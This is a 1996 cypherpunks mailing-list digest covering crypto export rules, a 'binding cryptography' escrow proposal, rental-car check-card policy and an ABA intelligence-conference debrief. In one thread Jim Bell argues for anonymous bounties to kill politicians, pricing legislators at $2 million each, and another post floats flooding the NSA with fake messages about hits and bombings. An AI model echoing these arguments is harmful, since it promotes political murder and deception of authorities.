Date: Sat, 19 Oct 1996 10:38:08 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Japanese Export Restrictions
Message-ID: <199610191729.MAA29797@sr.radiks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Has any one been able to verify the anonymous posters assertion concerning
japanese crypto export restrictions?
-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBMmkPBv+hzPlzwZAdAQHYMQgAs8OOCNOlfh8taXKtvmtXRJaYW9KBahF/
9BWt2rZWpvhuLgZoXkatMH/jkDQ53mjD+M8G1ROtmVgvOCcIrN16MI1pKLGj8Kht
rjk8xsVnc+yczBahTNXkVg4byew+qoGgNqqD4GZsQy5uYuEf696tTKkKn0c8j/by
c8wSINk41yZEPUbZDswXF4CGVvQ4U52MqnOGAs1AjX3eq/qRmfm2HZAYQhT0D9nX
NrPlv43uRPtSjaP+biq3i4Q9YnEriTjvs/HZg7zJjXIOTpTwiK9C6hWlLD6qmqnx
LcOQQB0YnOmFonaCc/CVKHz0ss5EXMqTbb1lOb0achceu+HZOhJbpw==
=HS5n
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: drose@AZStarNet.com (David M. Rose)
Date: Sat, 19 Oct 1996 12:45:02 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: is there no end to Murder Politics & Creative Wiretap Arguments?
Message-ID: <199610191943.MAA23124@mailhost.azstarnet.com>
MIME-Version: 1.0
Content-Type: text/plain


>From: hallam@ai.mit.edu
>To: jimbell@pacifier.com, cypherpunks@toad.com
>Cc: hallam@ai.mit.edu
>Subject: Re: is there no end to Murder Politics & Creative Wiretap Arguments? 
>Date: Sat, 19 Oct 96 14:14:18 -0400
>X-Mts: smtp
>Sender: owner-cypherpunks@toad.com
>Precedence: bulk
>X-UIDL: 4c7d7a4a67ee32ebe0b7420122e108b7
>
>
>>Actually, no.  AP "stacks the deck" dramatically against those few who 
>>engage in war crimes.  People from all sides of a dispute who object to them 
>>can donate, and anybody considering participating in war crimes has to keep 
>>this absolutely secret.  
>
>You hve absolutely no idea of what is happening in Bosnia. There
>is widespread support in each of the communities for genocide 
>policies. 

Yadda yadda.

Phill, would you consider not cc'ing C-punks on your missives to Jim Bell?
You seem to be getting quite excited, and the next thing you know, those on
the list will be faced with a series of anonymous posts suggesting that Jim
has crumbs in his beard, or some other unnatural act.

Dave





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Sat, 19 Oct 1996 10:46:13 -0700 (PDT)
To: cypherpunks <cypherpunks@toad.com>
Subject: Car Rental: Refusal to take Check Cards
Message-ID: <Pine.SUN.3.94.961019134233.19884H-100000@polaris>
MIME-Version: 1.0
Content-Type: text/plain



Curious about this policy I went out to rent a few cars this week with a
new check card from a local D.C. bank.

Here were my results:

Avis: Refused
Hertz: Refused initally, but accepted after coaxing
Thrifty: Refused
National: Refused
Alamo: Refused, got quite impolite after coaxing
Enterprise: Accepted, but only because the teller barely spoke english
Dollar: Closed

The policy seems to be well entrenched.  A few calls and some phone
jockying finally produced an explanation from Richard Vine, Assistant to
Edward L. McCarty the President and General Manager of Enterprise
Rent-A-Car.

According to him:

When the customer rents a car and uses a normal credit card, the
Rent-a-Car company "reserves" the funds which are essentially "In limbo."
By requesting an authorization from e.g., Visa for a certain amount, that
amount is deducted from the credit line of the customer.  The customer
cannot spend it away and it is essentially "reserved" for the rental car
company.  The rental car company, should they be forced to try and collect
funds, essentially has an option on the funds (a security interest in the
credit of the consumer?)

Check cards suffer from a few defects from the view of car rental
companies.

1.  The customer can stop payment on a charge.
Although I pointed out that a customer can likewise stop payment on a
credit charge, it appears that while the credit card issuers must adhere
to a standard requirement for dispute resolution (between merchant and
issuing bank) check cards often have no standard dispute resolution system
or no system at all.  This leaves the recourse to negotiations between
rental car company and consumer.  This often results in collection
procedures.  (Read, expensive)

2.  The customer can spend down the account entirely before the payment is
posted.
This cannot be done with credit cards as a portion of the credit line is
"authorized but not processed."

Essentially the rental car companies are concerned that they may never be
paid.  It seems check cards have been the subject of much abuse in this
field.  Check cards do not provide for instant clearing as far as I can
tell.  I think check cards simply give the account number to the
merchant's machine and then a "check" is printed out on the spot and
signed by the customer.  As far as I can tell, the transaction still
requires processing, even if it is a bit more automated.

One would assume that on the spot clearing methods (digital cash) would
solve this problem.  Just TRY, however, to rent a car with real cash.

I pointed out "Many check cards don't necessarily look like check cards,
how are you dealing with that?"

Answer: "We're working on it."

Cash is dead.

(The good news is that I had 2 rental cars to play with for the day.
Haven't yet decided if I should take the $200 out of my checking card
account before the transactions post).

--
I hate lightning - finger for public key - Vote Monarchist
unicorn@schloss.li






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Sat, 19 Oct 1996 14:02:12 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: is there no end to Murder Politics & Creative Wiretap Arguments?
Message-ID: <199610192101.OAA23889@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 02:14 PM 10/19/96 -0400, hallam@ai.mit.edu wrote:
>
>>Actually, no.  AP "stacks the deck" dramatically against those few who 
>>engage in war crimes.  People from all sides of a dispute who object to them 
>>can donate, and anybody considering participating in war crimes has to keep 
>>this absolutely secret.  
>
>You hve absolutely no idea of what is happening in Bosnia. There
>is widespread support in each of the communities for genocide 
>policies. 

After 4 years of killing?  I wouldn't be surprised, although what you say 
sounds like an exaggeration.  But that's four years of NON-AP conditions.  
Don't blame AP for problems caused by NON-AP practice.


>You do not demonstrate any reason why people would be more interested
>in murdering politicians than other people. 

Actually, I think I did, although I'll spell it out in more detail since 
it's so easy.  If looked at on a "per-dollar-stolen" basis, an individual 
would have no more reason to kill a given politician than a criminal.  
However, since politicians are typically responsible for thousands of times 
more theft than common criminal,  this will result in a vastly greater 
motivation.  For example, in the US, 535 Federal legislators preside over $1 
trillion in thefts, or about $2 billion per legislator.  If only 1/1000 of 
that money were spent to eliminate the problem, that would be $2 million 
per-legislator bounty, which should be far more than enough.


>You assume that contract murderers do not have political or social
>agendas of their own. A member of the KKK is much more likely to 
>become a contract killer than a liberal. 

That doesn't bother me at all.  It is the contribution system which will 
decide who the likely targets will be, not the killers themselves.  If 
anything, an ex-KKK person would have far less desire to lynch a random 
black, for example, if instead he can make thousands of dollars killing 
genuine bad-guys.    


>>How long do you think that such groups would last with AP functional?  
>
>Murder Politics (lets give your psychopathic scheme an acurate name)
>will never be functional. If anonymous cash implied muder politics then
>society would be right to reject anonymous cash. 

Except that the current political system is far worse.  The system has been 
hijacked by a small subset of the population, who manipulate it for their 
own benefit.  Once in control, it became in their interest to vastly 
increase the power and influence of government, which they did in America 
over the last 80+ years.  AP provides the prospect of making control of 
government useless and even potentially fatal, eliminating much of the 
corruption that is normally seen.  I think people will reject AP only to the 
extent that they misunderstand it.

In addition, one of the benefits of living in a world with many different 
countries is that each may try out a different system, with the successful 
ones tending to prosper, and the less successful ones dying off.  (Witness 
1989 and Communism, for example.)    I contend that the first society to 
adopt AP will be so dramatically successful, it'll spread inexorably.  
That's why the people in control of the current political systems will want 
to resist AP so strenuously.

>It is easily done
>since money only has value so long as it is convertable. 
>
>Not only are rights dependent on a social infrastructure that
>guarantees that they will be respected but currency is as well.
>Without the social and political infrastructure of the US 
>government a dollar bill has only the value of the paper its 
>printed on. An electronic balance has zero value. 

All you're saying is that the people who are currently in power will resist. 
 I know that.  But they will fail.


>If you want to live in a society where the political system has been
>"reformed" through murder of inconvenient politicians then go and
>live in Columbia. Its the nearest thing you will find on the planet
>to libertopia.

No, not nearly enough politicians have been killed in Columbia to result in 
a society that could best be described as an "anarchy."


Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hallam@ai.mit.edu
Date: Sat, 19 Oct 1996 11:08:43 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: is there no end to Murder Politics & Creative Wiretap Arguments?
In-Reply-To: <199610191745.KAA15143@mail.pacifier.com>
Message-ID: <9610191814.AA31571@etna.ai.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain



>Actually, no.  AP "stacks the deck" dramatically against those few who 
>engage in war crimes.  People from all sides of a dispute who object to them 
>can donate, and anybody considering participating in war crimes has to keep 
>this absolutely secret.  

You hve absolutely no idea of what is happening in Bosnia. There
is widespread support in each of the communities for genocide 
policies. 

You do not demonstrate any reason why people would be more interested
in murdering politicians than other people. 

You assume that contract murderers do not have political or social
agendas of their own. A member of the KKK is much more likely to 
become a contract killer than a liberal. 


>How long do you think that such groups would last with AP functional?  

Murder Politics (lets give your psychopathic scheme an acurate name)
will never be functional. If anonymous cash implied muder politics then
society would be right to reject anonymous cash. It is easily done
since money only has value so long as it is convertable. 

Not only are rights dependent on a social infrastructure that
guarantees that they will be respected but currency is as well.
Without the social and political infrastructure of the US 
government a dollar bill has only the value of the paper its 
printed on. An electronic balance has zero value. 


If you want to live in a society where the political system has been
"reformed" through murder of inconvenient politicians then go and
live in Columbia. Its the nearest thing you will find on the planet
to libertopia.


		Phill




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dale Thorn <dthorn@gte.net>
Date: Sat, 19 Oct 1996 14:38:08 -0700 (PDT)
To: Clint Barnett <cbarnett@eciad.bc.ca>
Subject: Re: DP (Disinformation Politics) was: NSA/GCSB spying [RANT]
In-Reply-To: <Pine.SGI.3.91.961018213534.21020A-100000@oswald>
Message-ID: <32694926.134F@gte.net>
MIME-Version: 1.0
Content-Type: text/plain


Clint Barnett wrote:
> It was not my intention to discredit the theory, in fact I believe I
> mentioned that in my original "e". When Canada changed to the Metric
> system, I went along with it, what could I do? Politicians raise my
> taxes, and I bear that burden as well.

[snip]

> If you think that you can resist the NSA and win, more power to you, and I'll help if
> I can, but I don't think you can.

You can't exactly resist them, that's true....

> However, I strongly believe that you have the power to limit the information they
> steal from you, and thereby limit the control they have over you.

How much limiting you can effect depends on how badly they want whatever info.... 

> If you can keep your wits about you, act fast when you have to, and run away to fight
> another day, then you can maybe do some good, but don't make a martyr of yourself or
> anyone else, because martyrs can't write code, they can't attack or defend a system,
> they can only lay there and rot in jail or in the ground.

Just like some people say that the answer to problem speech is more free speech, not 
suppression, I say the only answer to the NSA (shy of pulling their funding somehow) is 
to simply throw so much stuff their way that they can't have live people read it, and 
they can't sort through it with profiling progams etc. since all of it would look so 
interesting that they couldn't just discard it.

You could even (and please don't quote me on this) flood them with "really interesting" 
looking snake-oil crypto, or fairly easily breakable e-messages with buzz words that 
require human operators to analyze.  This latter item would require the originators to 
familiarize themselves with current (and rapidly changing) street slang for such 
concepts as "doing a hit", "bombing a car", "kidnapping an executive", and so on.

People on this list are lining up resources to crack single DES, ostensibly to hold up 
in front of some Congressional committee and say "look, we did it, now you'll have to 
cancel your export proposals", etc.  Well, I spent a number of hours with people like 
Willis Carto and Bob Fletcher, who have waved a great deal of interesting stuff in front 
of Congressional committees, and look what it got them.  In Carto's case, bombed, 
raided, discredited and demonized, and bled of much money, and in Fletcher's case, shot, 
gassed, and his son chemically attacked with loss of lung, ....

I have to wonder, if we were to develop some disinformation software, and maintain a 
database to drive it, if we couldn't use some of the resources they're gonna throw at 
single-DES to create zillions of messages, each varying slightly in content (the main 
function of the disinfo software), and with randomized headers to defeat the NSA filters 
and whatever.  It should not be at all difficult to cull a list of interesting places to 
send the messages to....

If Jim Bell's AP is to be the free man's bastion of last resort, one might consider in 
the meantime organizing a network of anonymous disinformers, who could generate and 
dispense disinformation as screensaver app's on whatever CPU's they have lying around.
Just exploring the idea of how much and what content would provoke the NSA et al would 
be great fun, and very educational.  The only *serious* crypto required, I think, would 
be for assuring anonymity over a long period of time, for a number of participants.

Since you couldn't monitor the NSA response directly, you'd also need to analyze a wide 
variety of media to look for hints about same.  If enough people got involved, there 
would be more opportunity for specialization of this sort.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@cypherpunks.ca (John Anonymous MacDonald)
Date: Sat, 19 Oct 1996 16:15:11 -0700 (PDT)
To: cypherpunks@toad.com
Subject: FWD: Binding crypto
Message-ID: <199610192303.QAA11812@abraham.cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain



FORWARDED MESSAGE

=++=++=++=++=++=++=++=++=++=++=++=++=++=++=++=++=++=++=++=++=++=++=+=


In this message, we introduce binding cryptography, a new proposal for
establishing an information security infrastructure that does not
hamper law enforcement. We present an alternative that can give
law-enforcement agencies access to session keys, without users having
to deposit private keys. Unilateral fraud in this scheme is easily
detectible. We outline the proposal below, and announce two articles
which will describe the proposal in more detail and which will provide
the legal and the technical context.

The text is also available at
http://cwis.kub.nl/~frw/people/koops/binding.htm.

9 October 1996
Eric Verheul, everheul@ngi.nl
Bert-Jaap Koops, koops@kub.nl
Henk van Tilborg, henkvt@win.tue.nl

-------------------------------------------

(c) 1996 Eric Verheul, Bert-Jaap Koops, Henk van Tilborg
This message may only be redistributed in its entirety and with
inclusion of the copyright notice. Credit if quoting.

_Binding Cryptography, a fraud-detectible alternative to key-escrow
proposals_

_1. Introduction_
Information security, and so cryptography, is essential in today's
information society. A robust (information) security infrastructure
must be set up, including a Key Management Infrastructure. However,
the unconditional use of encryption by criminals poses a threat to law
enforcement, a problem that is hard to solve. Consequently,
governments have two tasks. The first is stimulating the establishment
of a security structure that protects their citizens, but which does
not aid criminals. The second task is coping with the use of
encryption by criminals outside of this framework. We think that
encryption outside of the framework (e.g., PGP) should not be outlawed
- but it need not be mainstream either. It is crucial that any such
established security structure is widely accepted and trusted, as this
will lower the demand for encryption outside of this framework, and so
will make the second goal easier to achieve (or, at least, not more
difficult). The establishment of such a widely accepted and trusted
security structure is now the challenge that (US) IT businesses face
if they want to participate in the recent CLIPPER IV initiative.

_2. Binding cryptography_
In a series of two articles, we address the establishment of an
information security infrastructure. Several proposals have been made
by governments and others to establish such an infrastructure, but a
satisfactory overall solution remains yet to be found. In the
non-technical article [VKT], we review several technical proposals and
a few government initiatives, focusing on key-escrow proposals. We
present a series of criteria that acceptable solutions should meet,
and note that all proposals so far fail to meet many of these
criteria. We argued that the establishment of a worldwide security
infrastructure can not be achieved without strong cooperation of
governments. In fact, governments themselves should take up the
challenge of establishing a security infrastructure, based on
public-key encryption, which does not hamper law enforcement. We offer
a new solution to achieve this: "binding data", which also improves
upon current proposals. It has the advantage that it helps the
establishment of a strong security infrastructure which discourages
abuse for criminal or subversive purposes by making unilateral abuse
easily detectible. It allows a straightforward monitoring of
compliance with law-enforcement regulations, without users having to
deposit ("escrow") keys beforehand. Thus, an information security
infrastructure can be established, which does not worsen the crypto
problem for law enforcement.

Metaphorically speaking, our solution consists of equipping public-key
encryption systems used for confidentiality with a (car) governor (a
speed-limiting device). The specifications of this governor are rather
general, and so many systems can probably be equipped with them. It is
inspired by the proposal of Bellare and Rivest [BR], in which users'
encrypted messages consist of three components:
1. the (actual) message encrypted with any symmetric system, using a random session
key; 
2. the session key encrypted with the public key(s) of the addressee(s);
3. the session key encrypted with the public key of a Trusted Retrieval Party (TRP).

In effect, the TRP is treated as a virtual addressee, although the
message is not sent to it. When a law-enforcement agency is conducting
a lawful intercept and strikes upon an enciphered message, they take
the third information component to the TRP. If shown an appropriate
warrant, the TRP decrypts the information component and hands over the
session key, so that the law-enforcement agency has access to the
message. Observe that users are not obliged to escrow their (master)
keys, they only give access to the (temporary) session keys used in
the communication. The concept of "virtual escrow" has been the base
of several escrow products (AT&T Crypto, RSA Secure, TIS Commercial
Key Escrow).

The main drawback of this concept is that it offers no possibility, at
least for others than the TRP, to check whether the third component
actually contains the (right) session key; moreover, the TRP will only
discover fraud after a lawful wiretap. This renders the solution
almost entirely unenforceable.

Therefore, we propose a binding alternative, which adds a fourth
component to the encrypted message: 
4. binding data.

The idea is that any third party, e.g., a network or service provider,
who has access to components 2, 3 and 4 (but not to any additional
secret information) can: 
a. check whether the session keys in components 2 and 3 coincide; 
b. not determine any information on the actual session key.

In this way, fraud is easily detectible: a sender that attempts to
virtually address a session key to the TRP (component 3) that is
different from the real one he uses on the message (or just nonsense)
will be discovered by anyone checking the binding data. If such
checking happens regularly, fraud can be properly discouraged and
punished. The binding concept supports the virtual addressing of
session keys to several TRPs (or none for that matter), for instance,
one to a TRP in the country of the sender and one in the country of
the addressee. The solution therefore offers the same advantage for
worldwide usability as the Royal Holloway [Holl] concept. We also
remark that the concept supports the use of controllable key splitting
in the sense of Micali [Mica] as well: a sender can split the session
key and virtually address all the shares separately to the addressee
and various TRPs using the binding concept. Moreover, the number of
shares and the TRPs can - in principle - be chosen freely by each
user. Finally we remark that the time-boundedness conditon (the
enforceability of the timelimits of a warrant) can be fulfilled by
additionally demanding that encrypted information (or all components)
be timestamped and signed by the sender; a condition that can be
publicly verified by any third party (e.g., monitor) as well.

A PKI that incorporates binding data hence has the following four
players: 
- Users, i.e., governments, businesses, and citizens, 
- TTPs offering trusted services (e.g., time-stamping and certification of
public keys), 
- TRPs aiding law-enforcement agencies with decrypting legally intercepted messages, 
- Monitors, monitoring communications encrypted via the PKI on compliance with 
binding regulations. For instance, these could be network operators or (Internet) service
providers.

In [VKT], we explain how we envision the framework in which the
binding concept could present a security tool in the information
society. We think the concept is flexible enough (e.g., in the choice
of TRPs) to be incorporated into almost any national crypto policy, on
both the domestic and foreign use of cryptography.

In a mathematical paper [VT], Verheul and Van Tilborg propose a
technical construction for binding data for an important public-key
encryption system: ElGamal. This construction is compatible with
Desmedt's [DESM] traceable variant of ElGamal. The construction is
based on the techniques used in zero knowledge proofs. We expect that
these constructions can be improved and that various other public-key
encryption systems can be equipped with binding data. We present this
as a challenge to the cryptographic research community.

An outline of the mathematical construction of binding ElGamal can be
found at http://cwis.kub.nl/~frw/people/koops/bindtech.htm.


_3. References_

[BR]	
M. Bellare, R.L. Rivest, "Translucent Cryptography. An Alternative to
Key Escrow, and its Implementation via Fractional Oblivious Transfer",
see http://theory.lcs.mit.edu/~rivest

[Desm]	
Y. Desmedt, "Securing Traceability of Ciphertexts - Towards a Secure
Key Escrow System", Advances in Cryptology - EUROCRYPT'95 Proceedings,
Springer-Verlag, 1995, pp.147-157.

[Holl]
N. Jefferies, C. Mitchell, M. Walker, "A Proposed Architecture for
Trusted Third Party Services", Royal Holloway, University of London,
see http://platon.cs.rhbnc.ac.uk

[Mica]
S. Micali, "Fair Public-key Cryptosystems'", Advances in Cryptology -
CRYPTO '92 Proceedings, Springer-Verlag, 1993, pp. 113-138.

[VKT]
E. Verheul, B.J. Koops, H.C.A. van Tilborg, "Binding Cryptography. A
fraud-detectible alternative to key-escrow solutions", Computer Law
and Security Report, January-February 1997, to appear. [*]

[VT]
E. Verheul, H.C.A. van Tilborg, "Binding ElGamal. A fraud-detectible
alternative to key-escrow solutions", will be submitted to
Eurocrypt97.

[*] For the Computer Law and Security Report, send subscription
enquiries, orders and payments to:

Pam Purvey
The Oxford Fulfilment Centre
PO Box 800, Kidlington
Oxford 0X5 1DX  UK
Tel: +44 1865 843373
Fax: +44 1865 843940

For the United States:
Elsevier Advanced Technology
Fulfilment (enquiries)
660 White Plains Road, Tarrytown
New York, NY 10591-5153
USA 
Tel: 914 333 2458

---------------------------------------------------------------------
Bert-Jaap Koops                         tel     +31 13 466 8101
Center for Law, Administration and      facs    +31 13 466 8149
Informatization, Tilburg University     e-mail  E.J.Koops@kub.nl
                  --------------------------------------------------
Postbus 90153    |  This world's just mad enough to have been made  |
5000 LE Tilburg  |    by the Being his beings into being prayed.    |
The Netherlands  |                (Howard Nemerov)                  |
---------------------------------------------------------------------
         http://cwis.kub.nl/~frw/people/koops/bertjaap.htm
---------------------------------------------------------------------

--
" The way to combat noxious ideas is with other ideas.  
  The way to combat falsehoods is with truth. " 

	-- Justice William O. Douglas, 1958







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Sat, 19 Oct 1996 14:40:33 -0700 (PDT)
To: cypherpunks <cypherpunks@toad.com>
Subject: Wrap Up: Conference on Law Enforcement and Intelligence
Message-ID: <Pine.SUN.3.94.961019145359.19884L-100000@polaris>
MIME-Version: 1.0
Content-Type: text/plain



Summary:

1.  Digital Cash is on the map.  The Department of Justice will be
aggressively pursuing it.

Money laundering is becoming an increasing priority and crypto policy in
the United States is almost certain to be a casualty.  It's no longer, as
it seemed to have been 6 months ago, a question of "well until the
government finds out what the potential is, we are ok."  It is now: "Until
the government can manage to get the right people in an office together."
I'm not sure this is a particularly long time.

2.  Remailers are on the map.  The Department of Justice will be watching
these and an active effort to penetrate them is under way.  What this
means exactly is unclear.

The Department of Justice, according to Jeff Smith and acknowledged by
nods and "hmmm"'s of agreement from the DoJ panel members, is going to be
attacking remailers.  No idea how this may take shape, but its in the
works.  Beware Vatis and his ilk.

3.  Both law enforcement and intelligence are displayingh an unnerving
amount of cooperation.

No longer can we depend on turf wars to distract them.

4.  Might be a good idea to review implementations of crypto.

Both James Woolsey and Stewart Baker made sly remarks about the
reliability of crypto in the public domain.  While this is to be expected,
it might be a good idea to begin to look at crypto with a more discerning
eye.  In private conversation with Stewart Baker, my collegue mentioned
the potency of crypto algorthms in the public domain.  Wouldn't this make
criminal use simply too easy?  Should law enforcement not be considering
banning all crypto.  Baker wasn't giving away any secrets, obviously, but
he did suggest that tho many of the publicly available methods were
potent, their implementations might be weak.  (This while touting a cute
little "PGP" litigation bag.  Anyone know where these can be found?)

Perhaps its time to consider a more direct and careful implementation
review of IDEA, 3DES, MD5 and other common methods?

How widely reviewed is PGP's implementation REALLY?
What about other public products?

Bottom line:
Be afraid, be very afraid. 

--
I hate lightning - finger for public key - Vote Monarchist
unicorn@schloss.li






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Sat, 19 Oct 1996 14:42:09 -0700 (PDT)
To: cypherpunks <cypherpunks@toad.com>
Subject: ABA Conference on Law Enfrocement and Intelligence - Debrief
Message-ID: <Pine.SUN.3.94.961019135625.19884J-100000@polaris>
MIME-Version: 1.0
Content-Type: text/plain



As I got sidetracked and it has been awhile, I am reposting the entire
summary along with the second half, which I just finished.

Typos are all mine.

:

The American Bar Association Standing Committee on Law and 
National Security - Law Enforcement and Intelligence Conference - 
Debrief

The ABA's Standing Committee on Law and National Security is one 
of the more successful Committees to come out of the ABA.  It's 
conferences and early morning breakfast briefings and lectures 
are attended by some of the leading experts in the fields of 
National Security, Law Enforcement, and Intelligence and no small 
number of the beltway power elite.

I'm not sure if many people outside the legal community 
understand the degree to which attorney's have impacted and 
thrived in both the law enforcement and the intelligence 
communities.  In fact many, if not most, CIA case officers and 
station chiefs, as well as field operatives, are attorneys or 
have law degrees.  Other intelligence organizations are no 
different.  It should come as little surprise then if a committee 
of the ABA should happen to attract a surprising amount of 
intelligence professionals.

This conference was no exception.  Spooks, Feds, Legislators, and 
even a few Kooks were in attendance.  Members of the British, 
American, Canadian, and German intelligence communities were in 
attendance.  A colleague and I attended the majority of the 
conference and except where noted the reflections below are a 
summary of our collective notes and thoughts on the subject 
matter discussed.  I'm taking a broad view of relevance to 
cypherpunks, but I will omit that which seems clearly not of 
direct or somewhat indirect interest.


Part One:

A Changed World for Law Enforcement and Intelligence in the 21st 
Century

Thursday, September 19

7:45 AM  Registration and Continental Breakfast

8:15 AM  Welcome Remarks
Paul Schott Stevens
Chair
ABA Standing Committee on Law and National Security

8:30 AM  I.  An Overview of a Changing World.

*The Traditional Relationship of Law Enforcement, Foreign 
Intelligence and National Security (1945-1995):

*How Have Other nations Balanced Legal and National Security 
Requirements and Responded to a Changed World.

*The Changed Threats to U.S. National Security- New Problems and 
Priorities

Elizabeth R. Rindskopf
Bryan Cave
Former General Counsel, Central Intelligence Agency
Member, Standing Committee on Law and National Security

Ms. Rindskopf outlined the three classic "periods" of 
intelligence community and mission development in U.S. history 
and set the stage for the discussions to follow.

Interesting subjects she did touch on included section 715 of the 
Senate intelligence bill.  The section allows the law enforcement 
community to request assistance from foreign intelligence in 
collection efforts on foreigners outside of the United States.

The BNC and BCCI scandals were discussed as a backdrop of the 
hazards of law enforcement and intelligence separation.

Zoe Baird
Senior Vice President and General Counsel
Atena Life and Casualty Company
Member, Standing Committee on Law and National Security.

Ms. Baird discussed the dangers presented by globalization and 
new technologies.  She highlighted the point that crime 
globalization often follows corporate globalization and the 
manner in which a single individual's ability to cause harm has 
increased in scope (The NYNEX Hack).  Also interesting was her 
discussion of the manner in which the more organized elements of 
criminal activity worked to take advantage of the very open 
society in the United States (Fund raising, publications, 
anonymous communications).

Those activities once merely violations of criminal law are, she 
argued, now increasingly national security concerns and that 
national security events impact elections in very dramatic and 
direct ways (Atlanta and Israel bombings as examples).

Crime, she pointed out, gets about an 80% response in the polls, 
where as "National Security and Foreign Policy" get perhaps a 3% 
response.  Merging these elements together serves an 
administration.  She also pointed out the trend toward making 
these issues generally more accessible to the public.  
(Specifically by use of language.  "Transnational threats"- which 
was a term of art for non-state terrorism and organized crime- 
becomes "Global Crime" or "Global Lawlessness."

Ms. Baird ended by asking how the firewalls between Law 
Enforcement and Intelligence could be rebuilt with these new 
considerations in mind.

I considered her a balanced cynic.  She managed to get across 
some very realpolitik notions without much murmuring from the 
(limited) civil libertarian crowd.

David Bickford
Former Legal Adviser to the British Intelligence Services (MI5-
MI6)

Mr. Bickford has in past served as a conduit between British 
Intelligence services and the United States.  He is well known 
and respected among the American and European Intelligence 
communities.  Knowing Mr. Bickford I can also say that he pays a 
great deal of attention to who his audience is and speaks to 
their interests with disarming accuracy.  His discussion is 
important because it is a good insight into what the policy 
makers in the United States are looking at.

He began by highlighting the new international nature of crime.  
No longer is it confined to power blocs.  "Multi-jurisdictional 
illegality" is increasingly a concern.  New highspeed 
communications channels are a contributor and organized crime 
groups are possessed of extremely advanced administration 
abilities.  They are leaner and meaner because they use 
computers, encryption, communications, and use up less resources 
in administration.  The ability to make the organization smaller 
also makes it harder to penetrate.  In this environment, 
international cooperation is essential.  He called for more 
active and expansive extraterritorial jurisdiction for certain 
crimes, and lamented his own country's lack of enthusiasm for 
this concept though they are slowly "coming around."

His solutions included the labeling of organizations, even when 
they are not geographically based, as "illegal international 
organizations" and using all means to combat them.  He envisions 
a wide cooperation by the G7 to accomplish this, leaving such 
organizations with no safe haven.  Sanctions regimes formerly 
employed only as against "rogue states" and countries in disfavor 
should be employed to destroy these illegal international 
organizations wherever they are.  He indicated that the other G7 
states should build on the recent Clinton Executive Order which 
seizes the assets of such organizations which may be located in 
the jurisdictions of the G7.  He called for measures to deny 
these assets access to the major securities and international 
finance markets and proposed that only organizations like the NSA 
could confront and complete these tasks.  Intelligence, he 
argued, is the only organization that can keep up with 
international crime and as a result there should be developed 
court processes to introduce intelligence into criminal cases 
while protecting the more sensitive information (sources and 
methods) as irrelevant.  "Evil men" have taken an "early lead."

$500 billion a year comes out of the United States alone in money 
laundering.  400 billion in assets is attributed to drug cartels, 
80% of which are Cali Cartel assets.  There are over 250 
international Russian criminal organizations currently operating.

Mr. Phillip Heymann
James Barr Ames Professor and Director,
Center for Criminal Justice
Harvard Law School
Member: Standing Committee on Law and National Security

[Didn't find his comments particularly relevant]

II. Political Challenges in the World Environment

*Breakup of the U.S.S.R.

*Loss of National Sovereignty and Control by Nation States

*Erosion of National Legal Systems
Military Threats at the Subnational Level:
The Terrorism Dilemma

(This looked very much like the section given to the Soviet 
Analysts, who no longer have much of a job to do).

Mr. Morton H. Halperin
Senior Fellow
Council on Foreign Relations
Former Special Assistant to the President and
Senior Director for Democracy, National Security Council

[Canceled]

Mr. Peter Rodman
Director, National Security Programs
Nixon Center for Peace and Freedom
and Former Deputy Assistant to the President for National 
Security Affairs

Mr. Rodman discussed the new "trans-national areas."  Terrorism, 
corruption, economic and criminal activity.  He discussed the 
side effects of collapsing empires (the rise of organized crime 
to enforce property and contract rights that cannot be enforced 
by the government, the shift of power to the local from the 
regional and executive areas) and discussed, in this context, the 
importance of avoiding petty squabbles over issues like trade and 
the like because they threaten the more important strategic 
cooperation that will be necessary to battle global and 
transnational criminal activity.

Ms. Jessica E. Stern
Consultant
Lawrence Livermore National Laboraory and
Former Director, Russian, Uklrainian and Eursian Affairs,
National Security Council

Ms. Stern discussed the severe proliferation problems presented 
by a weak Russia, particularly the weakening of MPCA (Material 
Protection Control and Accounting).

11:15 AM  III.  Technical and Practical Changes in the Relevant 
World Environment

*Global Technologies Emerge
*"Equal Access" to Advanced Technology by State and Private 
Actors
* Change in Size, Type and Location of National Security Threats: 
Challenge for Modern Intelligence and Law Enforcement

Stewart Baker
Steptoe and Johnson
Former General Counsel, National Security Agency
Member, Standing Committee on Law and National Security

Mr. Baker's remarks were brief, but he discussed the evening of 
the odds with respect to government and private organizations 
caused by technology.

Admiral William O.. Studeman
United States Navy (retired)
Former Acting Director of Central Intelligence

Admiral Studeman discussed "Information Warfare," pointing out 
specifically that advanced societies were more vulnerable because 
of their financial, banking and revenue system's dependence on 
computer.  Power, air traffic control, public safety and media 
were also mentioned in passing.

Admiral Studeman went on to call for more intense secrecy in law 
enforcement (not intelligence) as to collection methods and new 
technology.  He called passionately for funding for the DigiTel 
program as well as a "key escrow" policy.

Anthony Oettiger
Chairman, Program on Information Resources Policy
Harvard University

Mr. Oettinger was perhaps the only moderate speaker in the 
conference.  He discussed Executive Order 13010 (establishing the 
Critical Infrastructure Protection organization) and called for 
more private sector input in policy making (Banks, markets, 
businesses want to make their own security arrangements, and are 
not very interested in paying much attention to the suits at 
their door who claim 'Hi, we're from the government, we are here 
to help.'

He pointed out the difference between the movements in Airline 
Security (which is drifting from privately maintained, to 
